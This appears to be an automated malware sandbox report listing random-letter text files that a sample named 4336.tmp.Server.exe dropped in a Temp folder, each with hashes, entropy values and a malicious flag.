                                                                                                                                                                                                                                Preview:LTKMYBSEYZYLWBDLQYQSGHCEKOMUGSMOJLJVFHAICZAEQCNCBEGUYSPUJHNJSDQTVUPUFCNWSVXGWFVWMFIWRQGVLGYUUBXDZXYJMKPAQTJLYUZTWHPYSRLPQBTKDHEWTTWLDXITQQAGNHQLMCYZCGICKEHUUXVCXHMYJQQYOQIXMRPWDNHFRXHXUHBSJQQHJNETRHWEBONEJBHTDQQNCEMAEDULTTSDIGDGEYCFSHOYFMDRTHCJKCFEFLMLVJNHUTISDTYYKQXVYELRXTCPVMTHGMXSDMUSFEPIIFBHCRRCGWXNWEXQGIUUAYBLCIBZGCXXZYYFPOIAUUAZEORINBBTOZEUXMAZYFVDWGLZZHOHNZHSEJYZULRNGAFKDQXEYHMJWAZXCTSLOIDSVWCDDAJVQOZRXWVWCMYQCKXRQMOHVCMJHXERQTMBGRETHKBIQULAPJVABDGMJDULEZZHMATXEUVKGXGGFBUQPNFRZOPVDFONCFHWZHXDJQQLBBLRNEDPABSGIFBWEQTJAGKFRSLLFIXBIADJYQFXLIYTRHHMHAEDZRJJZZSOCKJNBHWWZEZXGEEJOALVQSBDQTYEHCQVMQMBKNHLBFIRUKLCVRFKGJWGONQGFFIPLGGCUDTZOLCUDDOARJHBVHHRZEYWWKNFEXBVKDTVKTGDMSUOSIIJKKXODRUCUDQHPOJRJZICJUGIDYTFJNVOJIFAVDFPGFTUQFDWLLALACJUWFIKJDQRZQVIIULGPKDOEMRGWVXSLFQHDVZJLHRKVFDXZZCYMKQTRZIBEAHUAXZFKIOBFQACDYLWSHXGVQBAYTXLOISPDOUTEJPQXZNCWCWFKRYQGOEIQEKGUMTCROZMZMVLTCMMBZZHLSYRTDCWSSQEKPTOUQZYPJDCZQTZSHURDOLLYIYFPIECQEHEYPDXHDRIYSOEILWHEODCIXNORCUDGORDQCYVQHNTVIZVMIQLRODCUBWDVZCRJJNXNJQMHPXE
                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exe
                                                                                                                                                                                                                                File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):1026
                                                                                                                                                                                                                                Entropy (8bit):4.690394987545919
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:24:x8Xtqp+Wamt5Tlx/0lL5fswH7s9cBus1XuWzv:+tNsfMswbVb+WD
                                                                                                                                                                                                                                MD5:CA901F8E74EB7955CF06A00BD424C0C2
                                                                                                                                                                                                                                SHA1:0876F92A018E8AB57F666FBB048B1CD028607A38
                                                                                                                                                                                                                                SHA-256:6DAB1DF82EDD11EEF4FD3B81E692BF065731935C03D4AAEB4493612188DD1D16
                                                                                                                                                                                                                                SHA-512:7363E62B6FB08E96BD561FA00A05C7A88C0C20943FC3FB9CD505C77CCB40C549F8943DDFCA69532F6544E9CC929EB5786C488F3D7E8F1AB0F05C3EA10E4EA0B2
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:NIKHQAIQAUYLAGKSNVEIEFIHRXSBOKMMEGWDWAKSEZEDBXXYJJOUSSENRJICLDBYWKJEUKRIBTNODZEVLZHOZSPIROLEDDZIVDLRTCVHZIXTARRYNQXDSJTZFOOYHUCROZUVPHMDRIWZWYNOATHQMKGZMPPIBYIAXUSGLYFPQTHUARHNEBTECYTUUCXJOESOPPKVXGBHXGPHIYJEJAYBFOVPMDVWEZNFBQJKZAWGCIWNFBSDPSSBBQTNYDJVQTTPUWPOOTVYKITOESDZWHOTFCZIQUYASDBGWAPMXAFIGQFPGWTRNBMHCXAZNMKIOSHYBMTSDERCDBFQSLEBTIGMCRUGZJZQAMYIFXIHLBUBWXCKIQTVQNMYMUYZWTTRQAVEAQFTTDTEFYTIXVPFUZALHHYLJHLNOFTPHODDWSFLBPCVKNDNFYPRHRVBHZSKKAJYBRTRWEHCIAZYAWYXGIRJSURFADGDZBTKMLEAYICWBYEAKNBIIDMQKZIXOLIQHETRIJJOSQDVZXKTZOMXOXGKIEJJNUHMCNVBNTYVETDBZHKYQLQYJBSUUNGMIURLIIINJAVXYNHTVSYTVBSAGNGQGUYADHTCDXNDKQFKCMHFRLWQZMSHDZEBEGPOSOPFUUHIVYBVXTLHFYHMHALQHNIUKMTKRBYZDOEALSNTXJRYMEETOQRISFEOVJSBVNMZFHXIDWOPIZKHISVTXVHAUPHEUOQLFVPNKREKEFDTLOWUVDKPDDCBKKSSGLLJSGVCAKVVFFKUKYVELNQTKZZRSDNEKDHUGDQWFBGFQMTINSXDOXPQOPZWHRDBBIZNGWLXSHCGVIBTIQEUTFYRIYKHRANDXVFREQPDFPRAKAFCQSRGTEIQGEAVDTJRESPBHYVTTLHWYQSKOZIBJZRSUJETZFCGMBHNYUSWWAENDXQUJFMLWZXGNLDFLSRZJBBJCPWKHFZXEVBDCLKULDSDXUFVEWFBMUMFQQONCJFFBARKNAVJ
                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exe
                                                                                                                                                                                                                                File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):1026
                                                                                                                                                                                                                                Entropy (8bit):4.696250160603532
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:24:5Gvoddnzj/gxR0e7uyJ9MLyy07KpRnPgNcnA+2/nSgTfK0Xzy:wv4zCR0ouAMG3wPgNuAZnSQXzy
                                                                                                                                                                                                                                MD5:2B6A90B7D410E3A4E2B32C90D816B4FE
                                                                                                                                                                                                                                SHA1:B8CD90C4CDCF41CBF18D88A4C01BBA22F670AD83
                                                                                                                                                                                                                                SHA-256:D65D483904467EB7373EDA8DFAE2070C057FC93465A4AC5C9FEF8B42340D9DAB
                                                                                                                                                                                                                                SHA-512:03AFBF42E5C04E928D03C687B0F17A0AB15428C78958B206DC6C50118B961C9DDF88A6E53B3115F09FDEE44EAFA46B262933164055532D3B4B4F9265F42A6C58
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:NWTVCDUMOBTPRQQPHXQLIMGPJXTEMPBNYLBFKQFUEVGISJSVQRMPMZSAYEYQSOTUAJFILXLTKFEVHLSAMYEEFLNJSHLTTFXRTDNUGXEFIGVCAWPMDNUICDIZGPHMESKWSMUPNOFEVXFTSHSKLCVHQTNKDHDMDRJOUTEUSCAUAVMVBMOSYKKRPPZYFUGXFXWMWRACKFCQOUHITLUCHGFZEOIPNCJFJOVBZIKDRNERXOSPKSRMHKTJUGFEOONFWLVNTJWXUFPADWYIUDKAZQXCZRFPUQQAMRTIOEHUDTLGOWYMIDOZAXTLGVEGUCQLJZGMIEQYOLWEMSGZUBWXOIBQEMQLQVGRBTUICFCEJGFTZRZCKJQEMATEONIMJKBYGQYDYXOLLROWXGYCNCVPTMRZSMMSZXKMNPSCJJJKKNRAJXGSLZNKJRJRGMCCCBCIGTLTFKNVDVIHYLGRNXDVIVWBCPNKNIFJAPQQWDQQEDDKNHVJRQJTKCUADORWREEDYTVFAOWHPNXWSNAJCVXCLLTNQPMJQHDILFNQUZJZZJJMMNDNGEBEGSTVAGZJMSMZHWJKNIAFGBUYMVADKCVLDGFQETUZXGUOUWXBBPNOWFERKMKMPOXIOTKJERPVXJGCIUKAGDGITLFYRIBAPKRESMNOMTVTZCXMODUUIGFMEMBMGAGXFZGAAZFCXDWBKKCPUKFFNMVKDFFVZYWKEKBWMADWDZXUIOOLCLIACESGRBJRSMXKUSOKXJEICCPRFWSISDTKVTDVAYSWLRHTWJGCXQMNITQJHCBMSCDRWKMGADWILLATOPVPILEQQGAIPRRUCJFTRRSSWITQKIWJOATZOBETZDBBWAIJIOXCUQSILQHQKEZXWFWWNVEWKZCGFYPBDSDBSFAZDZFRHJBZIGOZCVUGODUTNCDHKKMFHSYKUSFSXOMOUXZYOSUZNJQBXAVPOBTVBINMSIPYONLYRKIHONKWHSUAJWIALOTZAQJSNTIH
                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exe
                                                                                                                                                                                                                                File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):1026
                                                                                                                                                                                                                                Entropy (8bit):4.699434772658264
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:24:Khfv+VFngw6i0t5Ut+l3kHwMDkhBlBAMFPxYaija:pvl6Pt5uQ3kQ0khBl1VxYpu
                                                                                                                                                                                                                                MD5:02D3A9BE2018CD12945C5969F383EF4A
                                                                                                                                                                                                                                SHA1:085F3165672114B2B8E9F73C629ADABBF99F178D
                                                                                                                                                                                                                                SHA-256:6088E17DB4C586F5011BC5E16E8BF2E79C496EB6DAE177FF64D9713D39D500CA
                                                                                                                                                                                                                                SHA-512:A126D98EE751D0FB768E4DB7D92CBC6AE7852FEE337B85ED045D871DB321C6C98FD58A244D058CA3F41348216C68CB4A37FA854980BB16D358AA62A932DD867E
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:ONBQCLYSPUBDAQCIGYNWXHPENQNLJZGXCHXSNXZNCZBUHYDXPEMCJPAWYQSVHMGKHJUFFFYDAXDAHOLOAZEPTWZTWDGPFLXMMCXLCIIJOXMVRNMUMTICVHQSWNAGIYCQBOZZHONWWBXKDUJYBRPSLNFGTUIFTNGJEATOXKHEFMERAQZVBMQGKZUKXDBMGRJDOOGATZZKQMEZJRWZVAZRPQTVWPETCIMLPMYNWZLVLXRPUUKLNIMTYDNYIJTZEFJDNMWTOFFKRRINCRDCFGJAJNMYQHGXGVHVYPEUFBNUIGUVGBYQKIAJLIVACVIHEGZIYKSROURNGZSCTUKBKFFCGPXAONPDEBIZJRKCFYHATDXLXYKGLWXBCHJERCRNMKESIMBDNPMPBWXSVSEAAUEKEGUIJBZLAESAFZHMBLPPKMNTZAZIIYSHMWJBFTZZSKYNFJYSBRLGVHOWZUQHXUSSJESIEKHZLTLILMSMJZHXFWGJQNWQCDLXEWBZPGBTVDVCPPUFLFGNZRUKJOANJVXVTXLOQLFUIVEWTCBKOBYZMAOTIMQMJYRYLSOLSSACCLCFTVXCKKJDNWQAETNXHIOQCDTXLLVEQLNLGDIOULNFNNDXTVYYSPDWWZHDSYHBRXMUAAHJIGSGLSFKCGADPUAASYZFEZWHYDLQDUCHJXMNMTNCDCMNIJQCSGEQOGVGYBYPMTZBBFOACZMMKVFNELOMGSTCQUDRFKLFGOHOTZKZCWJWDRECGYETFYOWLYECGICMGUKZRVNHUQTLQLHUTPRZXBVYMPAFBLSWKSSKBGWCWBFEEZIAZUZGEYMYBSXYUCHEALFJRSGWQJMABNQHSZANDDTYMVJKXFFFDEENZAGRGVLHFELVOSGTXVOOPFGCQDSFWOYKKOYUHFWMXWPLHFIIPORMEJNOFYMJRBAZLYTIOKEFIWPDZUKMIWKLZXBOESUCXZXQSCMQKDKFBCHJMPMZHELLNSYYEJNBRRXVBMPD
                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exe
                                                                                                                                                                                                                                File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):1026
                                                                                                                                                                                                                                Entropy (8bit):4.699434772658264
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:24:Khfv+VFngw6i0t5Ut+l3kHwMDkhBlBAMFPxYaija:pvl6Pt5uQ3kQ0khBl1VxYpu
                                                                                                                                                                                                                                MD5:02D3A9BE2018CD12945C5969F383EF4A
                                                                                                                                                                                                                                SHA1:085F3165672114B2B8E9F73C629ADABBF99F178D
                                                                                                                                                                                                                                SHA-256:6088E17DB4C586F5011BC5E16E8BF2E79C496EB6DAE177FF64D9713D39D500CA
                                                                                                                                                                                                                                SHA-512:A126D98EE751D0FB768E4DB7D92CBC6AE7852FEE337B85ED045D871DB321C6C98FD58A244D058CA3F41348216C68CB4A37FA854980BB16D358AA62A932DD867E
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:ONBQCLYSPUBDAQCIGYNWXHPENQNLJZGXCHXSNXZNCZBUHYDXPEMCJPAWYQSVHMGKHJUFFFYDAXDAHOLOAZEPTWZTWDGPFLXMMCXLCIIJOXMVRNMUMTICVHQSWNAGIYCQBOZZHONWWBXKDUJYBRPSLNFGTUIFTNGJEATOXKHEFMERAQZVBMQGKZUKXDBMGRJDOOGATZZKQMEZJRWZVAZRPQTVWPETCIMLPMYNWZLVLXRPUUKLNIMTYDNYIJTZEFJDNMWTOFFKRRINCRDCFGJAJNMYQHGXGVHVYPEUFBNUIGUVGBYQKIAJLIVACVIHEGZIYKSROURNGZSCTUKBKFFCGPXAONPDEBIZJRKCFYHATDXLXYKGLWXBCHJERCRNMKESIMBDNPMPBWXSVSEAAUEKEGUIJBZLAESAFZHMBLPPKMNTZAZIIYSHMWJBFTZZSKYNFJYSBRLGVHOWZUQHXUSSJESIEKHZLTLILMSMJZHXFWGJQNWQCDLXEWBZPGBTVDVCPPUFLFGNZRUKJOANJVXVTXLOQLFUIVEWTCBKOBYZMAOTIMQMJYRYLSOLSSACCLCFTVXCKKJDNWQAETNXHIOQCDTXLLVEQLNLGDIOULNFNNDXTVYYSPDWWZHDSYHBRXMUAAHJIGSGLSFKCGADPUAASYZFEZWHYDLQDUCHJXMNMTNCDCMNIJQCSGEQOGVGYBYPMTZBBFOACZMMKVFNELOMGSTCQUDRFKLFGOHOTZKZCWJWDRECGYETFYOWLYECGICMGUKZRVNHUQTLQLHUTPRZXBVYMPAFBLSWKSSKBGWCWBFEEZIAZUZGEYMYBSXYUCHEALFJRSGWQJMABNQHSZANDDTYMVJKXFFFDEENZAGRGVLHFELVOSGTXVOOPFGCQDSFWOYKKOYUHFWMXWPLHFIIPORMEJNOFYMJRBAZLYTIOKEFIWPDZUKMIWKLZXBOESUCXZXQSCMQKDKFBCHJMPMZHELLNSYYEJNBRRXVBMPD
                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exe
                                                                                                                                                                                                                                File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):1026
                                                                                                                                                                                                                                Entropy (8bit):4.692693183518806
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:24:FrPOQ32qakAnGkyNl2g/fQJnKVOvsyX1aZKx1aHEg:53Sq9/fiK4XQfHEg
                                                                                                                                                                                                                                MD5:78F042E25B7FAF970F75DFAA81955268
                                                                                                                                                                                                                                SHA1:F7C4C8DDF51B3C5293E0A92F6767D308BBF568B4
                                                                                                                                                                                                                                SHA-256:E4C9709AFEA9D9830CED1AA6DF1711D0332A5972688640368DDC32C07C0D5D17
                                                                                                                                                                                                                                SHA-512:CE2548833F62C549CA0268BE445E517AC986CA44EA52916A153DFFE4D7FA59B703E5927DFE70836E8B082C246793DF2066D72DB4A6E1C948940E88C524952348
                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:HTAGVDFUIELGZFCTZZGRSQISCXMOKSCAZEJVAPBPJKABIZKEGFAGMGOIUPHPJOYIWMVIKWCNUOWDMGCFXJQANMMOULIVTQQGUZVVOLZWBYTHYOHMMVIMTTBBCAIGONNRVEUMTCTCEMTWFNDSQPHEPLAFZAKYSROZKRQDUZOUZIKJGJRIBJODHOULJHWQBIJSAIYMXLFOSFOEFKTQPEEWFTFCIFSLHXSXYXBWTPCWMCGPETOSVLNKYCONFWCIUFEQKOWQNQKJSIZKNZXOQWMTJOGWDBUFBKDXUPYYIXUTOPSOVWLVKIOKFPSXDAVMBUZIYYZUQTDLZIMRRGXLTOEJMFWLOMNPNLICPZPKTHPXELGBYTJLOJOEWNRDNMXXRYMAJBWCTNMBREIJDVVIXEHEGYQKZQCGLVHOCMUSKXCQQMURLYKWUIUMFSGYMZUQXCTZOKQYXJAUDEVTSOOQUKZKKEEOANGSIIWTUVEGHTCOTXCDTCZIFUAWDLWKDNQTUAXBCRBKEGHCEPWTXOQVBWKIXLQEUCHHRHMKWOVVBFOLNUHSLLMHOOFDQCOVQVCNKKYOGNPYFHMPHXNPOTANYIGKSXGYDKBAEAYCNSDEQRTDZXKUOIUOHOMJPCCDXHJTXLKPCLAKLUNDAFZVUXKBSBAWUIBEQFANHTKLDXHBVLMBIXZUPHFUIHTECGPPEITWIRPTQHJDDRMAQERQMDOELBOQSEMMMCCUPQVDZXOFFYQSEIDXDPFNKRGYVUDDHHQGPRFUFAJOKTJSGMHWRXPZFPTHUACEOFEZUYOSJGJLFUTHTDWBPUETPFOWWTNVGDPCHGGCYSORPYRNRZVFDIQZLGVXSZLKMPDVKQURMLSZDDXVNBPXKBLQIKBTAWLYTZWTFUNWLSZPWUWBVBXUJMBCFHPMBIRGLQAWDQTJEHKOGMUTEILXROVHXNUORTTYMCMDGNZYCCCTIABCKYPUCGPPUUSBWLIPYZKIMRHFVZCGDPKZ
                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exe
                                                                                                                                                                                                                                File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):1026
                                                                                                                                                                                                                                Entropy (8bit):4.687722658485212
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:24:gTVIxDsK0PxMQbXpEHH8+976o9VWmCUGGFT3IIU8wyG33bu3jUn:gZIxDW5lj02otC1G5IIUF/n
                                                                                                                                                                                                                                MD5:9A59DF7A478E34FB1DD60514E5C85366
                                                                                                                                                                                                                                SHA1:DE10B95426671A161E37E5CE1AD6424AB3C07D98
                                                                                                                                                                                                                                SHA-256:582393A08E0952F43A544A991772B088CC77CE584F8844DE6C5246BA36E703D5
                                                                                                                                                                                                                                SHA-512:70B4673D358E097AB2B75633A64A19C16E1422C81B6B198D81BF17B7609BFB4ACF5DE36228FF3884C5B9BA0A15E13F56C94968E5136B497C826F3D201A971B00
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:LTKMYBSEYZYLWBDLQYQSGHCEKOMUGSMOJLJVFHAICZAEQCNCBEGUYSPUJHNJSDQTVUPUFCNWSVXGWFVWMFIWRQGVLGYUUBXDZXYJMKPAQTJLYUZTWHPYSRLPQBTKDHEWTTWLDXITQQAGNHQLMCYZCGICKEHUUXVCXHMYJQQYOQIXMRPWDNHFRXHXUHBSJQQHJNETRHWEBONEJBHTDQQNCEMAEDULTTSDIGDGEYCFSHOYFMDRTHCJKCFEFLMLVJNHUTISDTYYKQXVYELRXTCPVMTHGMXSDMUSFEPIIFBHCRRCGWXNWEXQGIUUAYBLCIBZGCXXZYYFPOIAUUAZEORINBBTOZEUXMAZYFVDWGLZZHOHNZHSEJYZULRNGAFKDQXEYHMJWAZXCTSLOIDSVWCDDAJVQOZRXWVWCMYQCKXRQMOHVCMJHXERQTMBGRETHKBIQULAPJVABDGMJDULEZZHMATXEUVKGXGGFBUQPNFRZOPVDFONCFHWZHXDJQQLBBLRNEDPABSGIFBWEQTJAGKFRSLLFIXBIADJYQFXLIYTRHHMHAEDZRJJZZSOCKJNBHWWZEZXGEEJOALVQSBDQTYEHCQVMQMBKNHLBFIRUKLCVRFKGJWGONQGFFIPLGGCUDTZOLCUDDOARJHBVHHRZEYWWKNFEXBVKDTVKTGDMSUOSIIJKKXODRUCUDQHPOJRJZICJUGIDYTFJNVOJIFAVDFPGFTUQFDWLLALACJUWFIKJDQRZQVIIULGPKDOEMRGWVXSLFQHDVZJLHRKVFDXZZCYMKQTRZIBEAHUAXZFKIOBFQACDYLWSHXGVQBAYTXLOISPDOUTEJPQXZNCWCWFKRYQGOEIQEKGUMTCROZMZMVLTCMMBZZHLSYRTDCWSSQEKPTOUQZYPJDCZQTZSHURDOLLYIYFPIECQEHEYPDXHDRIYSOEILWHEODCIXNORCUDGORDQCYVQHNTVIZVMIQLRODCUBWDVZCRJJNXNJQMHPXE
                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exe
                                                                                                                                                                                                                                File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):1026
                                                                                                                                                                                                                                Entropy (8bit):4.699434772658264
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:24:Khfv+VFngw6i0t5Ut+l3kHwMDkhBlBAMFPxYaija:pvl6Pt5uQ3kQ0khBl1VxYpu
                                                                                                                                                                                                                                MD5:02D3A9BE2018CD12945C5969F383EF4A
                                                                                                                                                                                                                                SHA1:085F3165672114B2B8E9F73C629ADABBF99F178D
                                                                                                                                                                                                                                SHA-256:6088E17DB4C586F5011BC5E16E8BF2E79C496EB6DAE177FF64D9713D39D500CA
                                                                                                                                                                                                                                SHA-512:A126D98EE751D0FB768E4DB7D92CBC6AE7852FEE337B85ED045D871DB321C6C98FD58A244D058CA3F41348216C68CB4A37FA854980BB16D358AA62A932DD867E
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:ONBQCLYSPUBDAQCIGYNWXHPENQNLJZGXCHXSNXZNCZBUHYDXPEMCJPAWYQSVHMGKHJUFFFYDAXDAHOLOAZEPTWZTWDGPFLXMMCXLCIIJOXMVRNMUMTICVHQSWNAGIYCQBOZZHONWWBXKDUJYBRPSLNFGTUIFTNGJEATOXKHEFMERAQZVBMQGKZUKXDBMGRJDOOGATZZKQMEZJRWZVAZRPQTVWPETCIMLPMYNWZLVLXRPUUKLNIMTYDNYIJTZEFJDNMWTOFFKRRINCRDCFGJAJNMYQHGXGVHVYPEUFBNUIGUVGBYQKIAJLIVACVIHEGZIYKSROURNGZSCTUKBKFFCGPXAONPDEBIZJRKCFYHATDXLXYKGLWXBCHJERCRNMKESIMBDNPMPBWXSVSEAAUEKEGUIJBZLAESAFZHMBLPPKMNTZAZIIYSHMWJBFTZZSKYNFJYSBRLGVHOWZUQHXUSSJESIEKHZLTLILMSMJZHXFWGJQNWQCDLXEWBZPGBTVDVCPPUFLFGNZRUKJOANJVXVTXLOQLFUIVEWTCBKOBYZMAOTIMQMJYRYLSOLSSACCLCFTVXCKKJDNWQAETNXHIOQCDTXLLVEQLNLGDIOULNFNNDXTVYYSPDWWZHDSYHBRXMUAAHJIGSGLSFKCGADPUAASYZFEZWHYDLQDUCHJXMNMTNCDCMNIJQCSGEQOGVGYBYPMTZBBFOACZMMKVFNELOMGSTCQUDRFKLFGOHOTZKZCWJWDRECGYETFYOWLYECGICMGUKZRVNHUQTLQLHUTPRZXBVYMPAFBLSWKSSKBGWCWBFEEZIAZUZGEYMYBSXYUCHEALFJRSGWQJMABNQHSZANDDTYMVJKXFFFDEENZAGRGVLHFELVOSGTXVOOPFGCQDSFWOYKKOYUHFWMXWPLHFIIPORMEJNOFYMJRBAZLYTIOKEFIWPDZUKMIWKLZXBOESUCXZXQSCMQKDKFBCHJMPMZHELLNSYYEJNBRRXVBMPD
                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exe
                                                                                                                                                                                                                                File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):1026
                                                                                                                                                                                                                                Entropy (8bit):4.695685570184741
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:24:SYuCgqv/1uycbC6SHsJPWXpOxTeVtblICcFX4xlyzK7y45wR39IRh:S1CPvsC6YE+XgleVtbQuKGf5M39IRh
                                                                                                                                                                                                                                MD5:A28F7445BB3D064C83EB9DBC98091F76
                                                                                                                                                                                                                                SHA1:D4E174D2D26333FCB66D3FD84E3D0F67AF41D182
                                                                                                                                                                                                                                SHA-256:10A802E683A2C669BB581DE0A192C8291DD2D53D89A2883A59CC29EB14453B93
                                                                                                                                                                                                                                SHA-512:42526FEC4220E50DB60BD7D83A07DEB9D5BE4F63AD093B518E9ECC86B779210B0170F6F64C9F16064D50CB12F03643BAC9995D4F3C0AFD5F8D38428D57ADE487
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:UMMBDNEQBNVIMBNGHYZCBKXWMQJKYISTANSRNFXXBKALIIEMEWAFQEPTEMZCIXXNMQBGOXWSDYSAWKIYPJITNREMVRXPPJZFUTMGRRRGTCHVLEWVUJGZEUQVONQVACEFWZUCIAFXPFGXIUOOBZEEMGMWJQIEKKICYJJWAFUKYZAJEGUQKGDPRPXCOWIPBRUGHWDFZLGSKZVCHVVPGLEFNGIVLBVNAOVXAPGATADJBIQTBNJGWXRSEYKCSVZOSTCBHYFHUDEWNGEIFCVREPZDZDZRITFEVFCQQWJYZXPUKJWHTWGWASTKDCAVEWZOIGFZHRWCJBVRLDWGVKPABCQUOHQIMLUFUGYGMPGPEMSRPPSGWIGRVPBGZIWLNEVYFFJBCMBSXVABNRNXULCTUAANAXDHKZOGVCNQZHMRBENWTTLQVVMDLNBEWHLPZHMPDGRLJWAQJDJRCWTFWIOLAURRCSMFJOCFDKUGPLTPABARXKPCRXOIHHVRWXAKGHOTYLCEQQYYDKVZQSYLCAEGGBQMMJGSNJWBTJXSVALINNRLURMPNGFXHJRVJIKQJSDLNIOXGIGDFDCOTGGXMDLTDYSIKCMPVINDDXXQCEQCRUBLFEWMYMSEGUHIKIGUYOMOXSKOTVNUNGWUFYKYRNZXOOTSRYXLZHRZXNEDJUNPYGNIIZSPVQBOLBRRRWGDMQWUTRSZWBYMXNMLKLFNZWJVDDPMJOXTVBMYRXNQFGBLURKFIUAHJBFFXNWQDYRLZADYGMETNXEOXLOJKYQPEYHUVTFGXQTGPQBWZQTVFXZFUVQERQZJCYYPFBYONAVFDOLTNRGWQYGSYWCWUWRETJZGVJMEFQTYPOLONVZFREVORMBQJOCLOALCJHHCHQSHKLUNBIRHRBSQSMERLKKFTGHUQKRPFIIELZZVXZVNHCIQYYXNMJNSOZOIRGGJKUWXNCWSNCFMGQIQVNKVIGRCLSDWQPEDLSLTGBRXRTMGFWYQSCLN
                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exe
                                                                                                                                                                                                                                File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):1026
                                                                                                                                                                                                                                Entropy (8bit):4.688284131239007
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:24:94BsLCi4I4Bpno3+PqX1T1MziEko3RYNdEK:alI4BjP4x9JGK
                                                                                                                                                                                                                                MD5:E8ACCA0F46CBA97FE289855535184C72
                                                                                                                                                                                                                                SHA1:059878D0B535AEE9092BF82886FC68DC816D9F08
                                                                                                                                                                                                                                SHA-256:CFB1D698291CFF6EFE21CB913EDEB823FA6F84B5F437F61ED9E04C6A80CC4DCD
                                                                                                                                                                                                                                SHA-512:185601B848EDE2A752D1DC0534A2593231C67AF68E506DD3BA05D93435780F378250B27898CBD61F225C5FE6AB72CD21638C6159FC2D107767D2AB43547E0E71
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:unknown
